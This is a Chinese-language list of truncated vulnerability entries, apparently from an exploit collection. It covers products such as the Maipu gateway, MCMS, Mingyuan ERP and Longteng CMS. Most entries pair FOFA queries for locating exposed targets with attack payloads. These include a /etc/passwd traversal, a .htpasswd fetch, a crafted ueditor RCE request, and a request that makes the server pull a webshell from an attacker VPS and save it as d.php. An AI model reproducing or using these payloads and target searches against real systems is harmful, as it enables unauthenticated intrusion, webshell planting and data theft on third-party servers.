M13-2迈普-多业务融合网关-InformationLeakage Hunter语法: title==“迈普多业务融合网关” 漏洞复现: payload: http://xx.xx.xx.xx/.htpasswd/
M16-1满客宝-后台管理系统-任意文件读取 漏洞描述: 满客宝后台管理系统 downloadWebFile 接口存在存在任意文件读取漏洞,未经身份验证的远程攻击者可通过该漏洞读取系统配置文件,获取XXL-JOB账户密码,若XXL-JOB部署在公网,可能会进一步导致后台远程命令执行。 fofa语法:
M14-1铭飞-MCMS-RCE 漏洞复现: payload: POST /static/plugins/ueditor/1.4.3.3/jsp/editor.do?jsonConfig=%7b%76%69%64%65%6f%55%72%6c%50%72%65%66%69%78%3a%27%27%2
M13-1迈普-多业务融合网关-RCE 漏洞描述: 迈普 多业务融合网关 send_order.cgi 接口处存在命令执行漏洞,未经身份验证的远程攻击者可利用此漏洞执行任意系统指令,从而获取服务器shell权限。 网站图片: fofa语法: title==“迈普多业务融合网关” 漏洞复现: payl
M12-1MajorDomo-DIY智能家居自动化平台-RCE 漏洞描述: MajorDoMo /modules/thumb/thumb.php接口处存在远程命令执行漏洞,未经身份验证的攻击者可利用此漏洞执行任意指令,获取服务器权限。 影响版本: MajorDoMo < 0662e5e 网站图
M11-1魔方-网表ERP-文件上传 漏洞描述: 魔方网表ERP mailupdate.jsp 接口存在文件上传漏洞,未经身份验证的远程攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个 web 服务器。 网站图片: 网络测绘: fofa语法: FOFA:icon_ha
M9-1Metabase-RCE 漏洞描述: 未经身份认证的远程攻击者利用该漏洞可以在服务器上以运行 Metabase 服务器的权限执行任意命令。 值得注意的是,修复后的版本也需要在完成安装后才可修复漏洞,否则依旧存在被攻击者利用的可能性。 影响版本: Metabase open source 0.
M8-1MaxView-StorageManager系统-RCE 漏洞描述: maxView Storage Manager系统dynamiccontent.properties.xhtml存在代码执行漏洞,攻击者可通过 dynamiccontent.properties.xhtml 执行任意代码获
M7-1铭飞-CMS-SQL 漏洞描述: 铭飞CMS在5.2.10版本以前list 接口处存在sql注入漏洞,能够利用该漏洞获取敏感信息,攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系
M6-1Milesight-VPN-任意文件读取 漏洞描述: Milesight-VPN是由Milesight Technology Co., Ltd.开发的一种集成了VPN功能的路由器产品。它旨在为用户提供安全、可靠的远程访问和连接解决方案。Milesight-VPN存在任意文件读取,攻击者可以通
M5-1MeterSphere-任意文件读取 漏洞描述: MeterSphere /api/jmeter/download/files 路径文件存在文件读取漏洞,攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。 影响版本: Met
M4-1Monitorr-文件上传 漏洞描述: Monitorr 1.7.6m 版本中发现漏洞。它已被宣布为关键。受此漏洞影响的是组件服务配置的文件 /assets/php/upload.php 的未知功能。对参数 fileToUpload 的操作会导致不受限制的上传,未经身份验证的攻击者可远程上传
M3-2明源云-ERP系统接口管家-任意文件上传 漏洞复现: payload: POST /myunke/ApiUpdateTool/ApiUpdate.ashx?apiocode=a HTTP/1.1 Host: target.com Accept-Encoding: gzip User-Agen
M3-1明源云-ERP系统接口管家-文件上传 漏洞描述: 明源云 ERP系统接口管家 ApiUpdate.ashx 文件存在任意文件上传漏洞,攻击者通过构造特殊的ZIP压缩包可以上传任意文件,进而控制整个服务器。 影响版本: 明源云ERP <= 4.5 网站图片: 网络测绘: fofa语法:
M2-1Muhttpd-任意文件读取 漏洞描述: muhttpd(mu-HTTP-deamon)是一个简单但完整的web服务器,用可移植的ANSI C编写。它支持静态页面、CGI脚本、基于MIME类型的处理程序和HTTPS。它在接受任何连接之前放弃特权,并且可以记录接收到的请求。它已经在GNU/Li
M1-1Milesight-VPN-任意文件读取 漏洞描述: MilesightVPN server.js接口处存在文件读取漏洞,攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。 网站图片: 网络测绘: fofa语法: FOFA:
L21-1LiveGBS–InformationLeakage 漏洞描述: LiveGBS部分接口存在未授权访问导致,可以通过组合漏洞修改任意用户密码 fofa语法: icon_hash=“-206100324” 漏洞复现: 敏感信息泄露,获取用户 i d payload: /api/v1/user
L20-4龙腾-CMS-PermissionAC 漏洞复现: webshell:http://ip/d.php payload: GET /api/file/multiDownload?file=http://vpsip:8888/webshell.php&savePath=d.php HTTP/1
L20-3龙腾-CMS-任意文件读取 漏洞复现: payload: GET /api/file/downloadFile?file=././././././././/etc/passwd HTTP/1.1 Host: Cache-Control: max-age=0 Upgrade-Insecur
L20-1龙腾-CMS-SSRF 漏洞复现: https://gitee.com/wanglongcn/ltcms payload: GET /api/file/downloadUrl?file=http://124.221.70.199:8888/c.php HTTP/1.1 Host: Cac